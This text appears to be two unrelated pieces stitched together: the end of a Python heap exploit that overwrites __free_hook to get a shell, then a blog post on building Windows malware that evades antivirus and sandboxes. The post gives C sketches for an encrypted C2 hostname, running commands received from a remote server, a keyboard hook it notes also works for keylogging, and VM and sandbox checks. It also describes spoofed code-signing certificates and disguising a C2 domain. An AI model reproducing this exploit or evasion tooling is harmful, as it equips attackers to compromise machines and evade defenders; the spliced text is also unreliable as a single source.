# set prev_size of c to 0x210 bytes
b = delete_heap(b);
b = new_heap(0xF2,"b"*0xf0+"\x10\x02")

# make 0xf8 tcache full
tcache1[0] = delete_heap(tcache1[0])

# c has prev_in_use=0 and prev_size=0x210 so it will consolidate
# with a and b and it will be put in the unsorted bin
c = delete_heap(c)

# make 0x108 tcache empty
for i in range(7):
    tcache2[i] = new_heap(0x108, "sss"+str(i))

# now we allocate chunks from area of  a|b|c
A = new_heap(0x108, "AAA")

# leak libc
addr=show_heap_leak(b)
libc_base = addr - 0x3ebca0
free_hook = libc_base + 0x3ed8e8
print "libc base = "+hex(libc_base)
print "free hook = "+hex(free_hook)


# make 0x108 tcache full because we can have max 10 chunks allocated
for i in range(7):
    tcache2[i] = delete_heap(tcache2[i])

# Both 0xf8 and 0x108 tcache bins are full
	
ADDR_TO_WRITE = free_hook	

# let's allocate chunk that overlaps b.
B = new_heap(0x1f8, "BBB")

# now, chunks B and b are allocated and have the same address. 
# We can use double free and tcache poisoning attack

# double free
delete_heap(B)
delete_heap(b)
# now the 0x1F8 tcache bin contains the same chunk twice

# allocate one of them and set next pointer to known address
b = new_heap(0x1f8, p64(ADDR_TO_WRITE))

new_heap(0x1f8, "kkkk")

# allocated chunk will have an address of &__free_hook, 
# overwrite __free_hook to one-gadget RCE there
super_pointer = new_heap(0x1f8, p64(libc_base + 0x04F322))

# trigger __free_hook that is overwritten to one-gadget RCE
delete_heap_and_shell(b)


Malware on Steroids Part 3: Machine Learning & Sandbox Evasion

 

( Original text by Paranoid Ninja )

It’s been a busy month for me and I was not able to find time to write the final part of the series on Malware Development. But I have been receiving too many DMs on Twitter lately asking me to publish the final part. So here we are.

If you are reading this blog, I am basically assuming that you know C/C++ and Windows API by now. If you don’t, then you should go back and read my other blogs on Static AV Evasion and Malware Development using WINAPI (basics).

In this post, we will be using multiple ways to evade endpoint detection mechanisms and sandboxes. Machine learning is applied at two major levels in most organizations. One is at the network level, where it tries to identify anomalies based on the behavior of network connections, proxy logs and patterns of connections over time. Most network ML solutions tend to analyze malware beacons and use DPI (deep packet inspection) to identify the malware. This is something that Microsoft ATA (Advanced Threat Analytics) or FireEye sandboxes do. On the other hand, we have endpoint agents like Symantec EP, Crowdstrike, Endgame, Microsoft Cloud Defender and similar monitoring tools which perform behavioral analysis of the code along with signature detection to detect malicious processes.

I will purely be focusing on multiple ways to make our malware behave like a legitimate executable or to confuse the endpoint agent so that detection is evaded. I’ve used the methods mentioned in this blog to successfully evade the Crowdstrike agent, Symantec EP and Microsoft Windows Cloud Defender; the videos of the latter I have already posted in my previous blogs. However, you might need to modify or add new techniques, as these might become detectable over time. One of the best ways to avoid AV is to disable process creation altogether and just use WINAPI. But that would mean carefully crafting your payloads and it would be difficult to port them to shellcode. That’s the main reason malware authors write their malware in C and only selected payloads in shellcode. A combination of the two makes malware unbeatable on all fronts.

Each of the techniques mentioned below creates a unique signature which most AVs won’t have. It’s more a matter of trial and error to check which AVs detect which techniques. Also remember that we can use stubs and packers for encryption, but that’s for a different blog post that I will do later.

P.S.: This blog excludes shellcode, the reason being that I will be writing a separate blog series on Windows shellcoding later. I will be using encrypted functions during the shellcoding part and not in this post. This post is specifically about how malware authors use C to perform evasions. You can also use the same APIs and code snippets mentioned below to craft a custom malware for Red Teaming.

main():

So, before we start, let’s try to get a basic understanding of how machine learning works. Machine learning is purely focused on the behaviour of the user (in the case of endpoints). In short, if we sign our malware and try to make it act like a legitimate executable, it becomes really easy to evade ML. I’ve seen people using PowerShell to write reverse shells, but they are easily detected due to Microsoft’s AMSI (Anti-Malware Scan Interface), which consistently keeps checking (including and mainly PowerShell) to detect malicious process executions and connections. For those of you who don’t know, Microsoft uses the DMTK (Microsoft Distributed Machine Learning Toolkit) framework, which is basically a decision-tree-based algorithm that specifies whether a file is malicious or not. PowerShell is very tightly controlled by Microsoft and it gets harder over time to evade ML when using PowerShell.

This is the reason I decided to switch to C and C++ to get reverse shells over the network, so that I could have flexibility at a lower level to do whatever I want. We will be using a lot of Windows APIs, encrypted variables and a lot of decision trees of our own to evade ML. This is supposed to work until Microsoft starts using the CNTK framework, which is much better than DMTK but at the same time harder to apply.

Encrypted Host & Process Names

So, the first thing to do is to encrypt our hostname. We can use something as simple as XOR, or any custom complicated mathematical equation, to decrypt our encrypted variable and get the hostname. I created a Python script which takes a hostname and a character and returns an XOR’d array:

As you can see, it gives the integer value of the XOR key, the length of the encrypted array and the whole encrypted array, which we can simply use in a C integer or char array.

The next step is to decrypt this array at runtime, and we need to hardcode the key inside the executable. This is the only key that we would be hardcoding into the code. Also, to make it complicated for the reverse engineer, we will write a C function that automatically detects that the last integer is the key and uses it to loop through the array and decrypt the encrypted string. Below is how it could look.
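A minimal sketch of what that calling code could look like (a fragment: the byte values and the key 0x42 are made-up placeholders that decode to evil.com, stdlib.h is assumed for malloc, and the Decrypter itself is shown right after):

// Hypothetical encrypted hostname ("evil.com" XOR'd with 0x42); the key is the last element.
char EncryptedHost[] = { 0x27, 0x34, 0x2b, 0x2e, 0x6c, 0x21, 0x2d, 0x2f, 0x42 };
int  HostLen = sizeof(EncryptedHost);

// Char buffer of the size of EncryptedHost, allocated on the heap.
char *DecryptedHost = (char *)malloc(HostLen);

// Pass the host, its length and the output buffer to the Decrypter function.
Decrypter(EncryptedHost, HostLen, DecryptedHost);
// DecryptedHost now holds the plaintext C2 hostname for the socket code.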

So, we are creating a char buffer of the size of EncryptedHost on the heap. We are then passing the host, its length and the decrypted host variable to the Decrypter function. Below is how the Decrypter function looks.
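A hedged sketch of such a Decrypter, assuming the key really is stored as the last element of the array (stdlib.h is needed for calloc/free):

// Not the author's original code: the last element of the encrypted array is
// treated as the XOR key, and every other element is XOR'd with it.
void Decrypter(char *EncryptedHost, int HostLen, char *DecryptedData)
{
    // Build an integer copy of the encrypted char array.
    int *EncryptedData = (int *)calloc(HostLen, sizeof(int));
    for (int i = 0; i < HostLen; i++)
        EncryptedData[i] = (int)EncryptedHost[i];

    int key = EncryptedData[HostLen - 1];        // the key hides as the last integer
    for (int i = 0; i < HostLen - 1; i++)
        DecryptedData[i] = (char)(EncryptedData[i] ^ key);
    DecryptedData[HostLen - 1] = '\0';           // NULL-terminate the recovered string

    free(EncryptedData);
}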

To explain in short, it creates an encrypted integer array from our char array and XORs the values back again using the key, converting the encrypted values to the original ones, and stores them in the DecryptedData array we created previously. With the help of this, if someone runs strings, they won’t be able to see any host in the executable. They would need to understand the math and set a proper breakpoint in a debugger to fetch the C2 host. You can create more complicated mathematical equations to decrypt the host if required. We can now use this DecryptedData array within our sockets to connect to the remote host.

P.S.: Reverse engineers & sandboxes can fetch the C2 names with the help of packet captures and DNS name resolutions. It is better to send raw packets to multiple hosts to obscure which one is the real C2 server. But at the same time, this can lead to easy detection of the malware. Check my Legitimate Domain Routing technique below, which is much better than using this.

If you’ve read my previous post, then you know that I created a cmd.exe process using the CreateProcessW WinAPI. We can do what we did above for creating processes as well. But instead of hardcoding the encrypted array for the process to be executed, we will send the process name as an array over the network once the executable connects to the C2 server, along with the host. We can also use authentication on the C2 server and only allow it to connect if it sends a proper key. Below is the code for creating processes using an encrypted char array over sockets.
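A rough sketch of that step (an illustration, not the author's original code), assuming an already connected Winsock SOCKET, the Decrypter from above, and windows.h/winsock2.h included:

// Receive an XOR-encrypted process name over an already connected socket s,
// decrypt it and launch it with CreateProcessW.
int RunRemoteProcess(SOCKET s)
{
    char enc[MAX_PATH] = { 0 };
    int  n = recv(s, enc, sizeof(enc) - 1, 0);   // encrypted name, key as the last byte
    if (n <= 0)
        return 0;

    char procA[MAX_PATH] = { 0 };
    Decrypter(enc, n, procA);

    wchar_t procW[MAX_PATH] = { 0 };
    MultiByteToWideChar(CP_ACP, 0, procA, -1, procW, MAX_PATH);

    STARTUPINFOW si = { sizeof(si) };
    PROCESS_INFORMATION pi = { 0 };
    if (!CreateProcessW(NULL, procW, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi))
        return 0;

    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);
    return 1;
}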

In this way, when a system sandboxes our executable, it won’t know beforehand what process we are going to execute. Below is a much clearer description of what we are doing:

  1. Decrypt C2 host at runtime and connect to host
  2. Receive password and verify if it is right
  3. If the key is right, wait for 5 seconds to receive encrypted array(process name) over socket
  4. Decrypt the received Process and run it using CreateProcessW API

With the help of the above technique, if our C2 is down, then the sandbox/analyst will not be able to find what we are executing since we have not hardcoded any processes to execute.

Code Signing with Spoofed Certs

I wrote a script in Python which can fetch and create duplicate certificates from any website, which we can use for code signing. One thing I noticed is that antiviruses don’t check and verify the whole chain of the certificate. They don’t even verify the authenticity. The main reason being that not every antivirus can connect to the internet in every organization to fetch and verify the certificates for every third-party application installed. You can find the certificate spoofing Python script on my GitHub profile here.

And here are the scan results of Windows ML Defender after signing:

Next, we will try to add a few features to our malware to detect if we are running in a sandbox or inside a virtual machine. We will try to evade sandboxes as much as possible and kill our executable as soon as we find anything suspicious. We need to make sure that our malware doesn’t even look suspicious, because if it does, the sandbox will quarantine it and send an alert that there is a suspicious process running. This is worse than plain detection, because this is where most SOCs catch the malware and the Red Team activity gets exposed.

Legitimate Domain Routing (Evade Proxy Categorization Detection and Endpoint Detection)

This is one of the best techniques I’ve found to date, and it works almost every time. Let’s say I buy a C2 domain named abc.com. I will modify the A records so that they point to Microsoft.com or some similar legitimate site for a month or so. When the malware executes on the victim’s system, it will connect to this domain, which will send a normal HTTP reply from Microsoft, and the malware will go to sleep for a few hours and then loop into doing the same thing. Now, whenever I want to get a reverse shell from my malware, I will simply change the A records of abc.com to my C2 hosting server and it will send a key over HTTP to the malware, which will trigger it to fetch shellcode or send a shell back to my C2. This way, our abc.com will also get categorized as a legitimate domain instead of a malicious or phishing site. And even the endpoint systems will not block it, since it is contacting a legitimate domain. Over time I’ve also used Symantec’s website to connect to as a temporary domain, later changing it to my malicious C2 server.

Check System Uptime & Idletime (Evades Virtual Machine Sandboxes)

If our executable is running in a virtual machine, the uptime will be pretty short since it will boot up, perform analysis on our binary and then shut down. So, we can check the uptime of the machine and sleep till it reaches 20-30 minutes and then run. Make sure to use NTP to check the time against an external domain, else sandboxes can fast-forward system time for process executions. Checking via NTP will make sure that the correct time is checked. Below is the code to check the uptime of a system, and also the idle time in case it is required.

Idletime:

Uptime:
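A hedged sketch covering both checks, using GetLastInputInfo for the idle time and GetTickCount64 for the (local, non-NTP) uptime:

#include <windows.h>
#include <stdio.h>

int main(void)
{
    // Uptime: milliseconds since boot (local check; the NTP comparison is separate).
    ULONGLONG uptimeMs = GetTickCount64();

    // Idle time: milliseconds since the last keyboard/mouse input.
    LASTINPUTINFO lii = { sizeof(LASTINPUTINFO) };
    GetLastInputInfo(&lii);
    DWORD idleMs = GetTickCount() - lii.dwTime;

    printf("Uptime: %llu min, idle: %lu min\n", uptimeMs / 60000, idleMs / 60000);

    // Sandboxes usually analyse a sample within minutes of booting.
    if (uptimeMs < 20ULL * 60 * 1000)
        return 0;   // too young: sleep or exit instead of detonating

    /* ... continue with the real payload ... */
    return 1;
}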

Check Mac Address of Virtual Machine (Known OUIs)

VMware, VirtualBox, MS Hyper-V and a lot of other virtual machine providers use fixed MAC unique identifiers (OUIs), which we can check in a loop to see whether the current MAC address matches any of those mentioned in the list. If it does, then it is highly possible that the malware is running in a virtual environment, mostly for the purpose of sandboxing and reverse engineering. Below are the OUIs that I know of at the moment. If there are more, do let me know in the comments.

Company and Products                               | MAC unique identifier(s)
VMware ESX 3, Server, Workstation, Player          | 00-50-56, 00-0C-29, 00-05-69
Microsoft Hyper-V, Virtual Server, Virtual PC      | 00-03-FF
Parallels Desktop, Workstation, Server, Virtuozzo  | 00-1C-42
Virtual Iron 4                                     | 00-0F-4B
Red Hat Xen                                        | 00-16-3E
Oracle VM                                          | 00-16-3E
XenSource                                          | 00-16-3E
Novell Xen                                         | 00-16-3E
Sun xVM VirtualBox                                 | 08-00-27

Below is the C code to detect the MAC address of a Windows machine.
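A hedged sketch of such a check with GetAdaptersInfo (link against iphlpapi.lib; the OUI list mirrors the table above and can be extended):

#include <windows.h>
#include <iphlpapi.h>
#include <string.h>
#pragma comment(lib, "iphlpapi.lib")

// Known virtualization OUIs (first 3 bytes of the MAC) from the table above.
static const unsigned char vmOuis[][3] = {
    {0x00,0x50,0x56}, {0x00,0x0C,0x29}, {0x00,0x05,0x69},   // VMware
    {0x00,0x03,0xFF},                                        // Microsoft Hyper-V
    {0x00,0x1C,0x42},                                        // Parallels
    {0x00,0x0F,0x4B},                                        // Virtual Iron
    {0x00,0x16,0x3E},                                        // Xen / Oracle VM
    {0x08,0x00,0x27},                                        // VirtualBox
};

int RunningInVm(void)
{
    IP_ADAPTER_INFO info[16];
    ULONG len = sizeof(info);
    if (GetAdaptersInfo(info, &len) != ERROR_SUCCESS)
        return 0;

    for (PIP_ADAPTER_INFO a = info; a != NULL; a = a->Next)
        for (size_t i = 0; i < sizeof(vmOuis) / sizeof(vmOuis[0]); i++)
            if (a->AddressLength >= 3 && memcmp(a->Address, vmOuis[i], 3) == 0)
                return 1;   // MAC prefix belongs to a virtualization vendor
    return 0;
}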

Execute shellcode when a specific key is pressed. (Sleep & hook method)

Here, we only execute our shellcode/malicious process when the user presses a specific key. For this, we can hook the keyboard and create a list of multiple keys that specify what kind of shellcode needs to be executed. This is basically polymorphism: executing a different shellcode each time, depending on the key, will confuse the antivirus, and secondly, in a sandbox no one presses any key. So, our malware won’t execute in a sandbox. Below is the code to hook the keyboard and check the key pressed.

P.S.: Below code can also be used for Keylogging 😉
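A hedged sketch of a low-level keyboard hook that only detonates on a chosen key (F9 here is an arbitrary choice) and that could just as easily log k->vkCode:

#include <windows.h>

static void RunPayload(void) { /* decrypt & execute the real payload here */ }

static LRESULT CALLBACK KbdProc(int nCode, WPARAM wParam, LPARAM lParam)
{
    if (nCode == HC_ACTION && wParam == WM_KEYDOWN)
    {
        KBDLLHOOKSTRUCT *k = (KBDLLHOOKSTRUCT *)lParam;
        if (k->vkCode == VK_F9)          // trigger key: a sandbox never presses it
            RunPayload();
        // k->vkCode could also be written to a log here, hence the keylogging remark
    }
    return CallNextHookEx(NULL, nCode, wParam, lParam);
}

int main(void)
{
    SetWindowsHookExW(WH_KEYBOARD_LL, KbdProc, GetModuleHandleW(NULL), 0);

    MSG msg;
    while (GetMessageW(&msg, NULL, 0, 0))   // the message loop keeps the hook alive
        DispatchMessageW(&msg);
    return 0;
}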

Check number of files in Temp and Recent Files

Whenever a malware is running in a sandbox, the virtual machine will have only a minimal number of recent files, the reason being that sandboxes are not used for everyday work. So, we can run a loop to check the number of recent files and also the files in the temp directory to check if we are running in a virtual machine. If the number of recent files is less than 10-15, just sleep or suspend the process. Below is a code I wrote which loops to check all files and folders in a directory.
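A hedged sketch of such a loop with FindFirstFileW/FindNextFileW, pointed here at %TEMP% and using the 10-15 threshold mentioned above:

#include <windows.h>
#include <wchar.h>

// Count the entries in a directory (e.g. %TEMP% or the Recent folder).
int CountFiles(const wchar_t *dir)
{
    wchar_t pattern[MAX_PATH];
    swprintf(pattern, MAX_PATH, L"%ls\\*", dir);

    WIN32_FIND_DATAW fd;
    HANDLE h = FindFirstFileW(pattern, &fd);
    if (h == INVALID_HANDLE_VALUE)
        return 0;

    int count = 0;
    do {
        if (wcscmp(fd.cFileName, L".") && wcscmp(fd.cFileName, L".."))
            count++;
    } while (FindNextFileW(h, &fd));
    FindClose(h);
    return count;
}

int main(void)
{
    wchar_t temp[MAX_PATH];
    GetTempPathW(MAX_PATH, temp);

    if (CountFiles(temp) < 15)   // an almost empty temp dir smells like a sandbox
        return 0;                // stay dormant
    /* ... continue with the real payload ... */
    return 1;
}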

Now I could keep going like this, but the blog would just get lengthier. Besides, below are a few more things you can code to check if we are running in a sandbox:

  1. Check if the hard disk size is greater than 60 GB (Default Virtual Machine Sandbox Size is <100GB)
  2. Check if Packet Capture Driver is installed in the registry (To check if Wireshark or similar is running for packet analysis)
  3. Check if Virtual Box additions/extension pack is installed
  4. WannaCry DNS Sinkhole Method

This is another method which WannaCry used. So basically, the malware will try to connect to a domain that doesn’t exist. If the lookup succeeds, it means the malware is running in a sandbox, since sandboxes will reply to an NX domain too to check if that’s a C2 server. If we get an NX domain in reply, then we can directly connect to the C2 host. BEWARE that DNS sinkholes can prevent your malware from executing at all. Instead, you can buy a certain domain and check for a customized response to determine if you are running in a sandbox environment.
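A hedged sketch of that check with getaddrinfo (the domain below is intentionally nonexistent and purely illustrative):

#include <winsock2.h>
#include <ws2tcpip.h>
#pragma comment(lib, "ws2_32.lib")

// WannaCry-style check: resolve a domain that should not exist.
// If it resolves anyway, something (a sandbox) is faking DNS answers.
int LooksLikeSandbox(void)
{
    WSADATA wsa;
    WSAStartup(MAKEWORD(2, 2), &wsa);

    struct addrinfo *res = NULL;
    int err = getaddrinfo("qwe8fz0a7d1x9.example", NULL, NULL, &res);

    if (err == 0 && res != NULL) {
        freeaddrinfo(res);
        return 1;    // the NX domain was answered anyway: likely a sandbox
    }
    return 0;        // NXDOMAIN as expected: safe to contact the real C2
}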

Now, there are many more ways to evade ML and AV detection, and they aren’t really that hard. Evading ML-based AVs is not rocket science, as people say. It just requires some free time to sit and understand how the underlying architecture works and find flaws to evade it.

It’s much better to invest in a highly technical threat hunter for detecting suspicious behaviors in your environment and logs rather than buying a high-end sandbox or antivirus solution, though the latter is also useful in its own sense.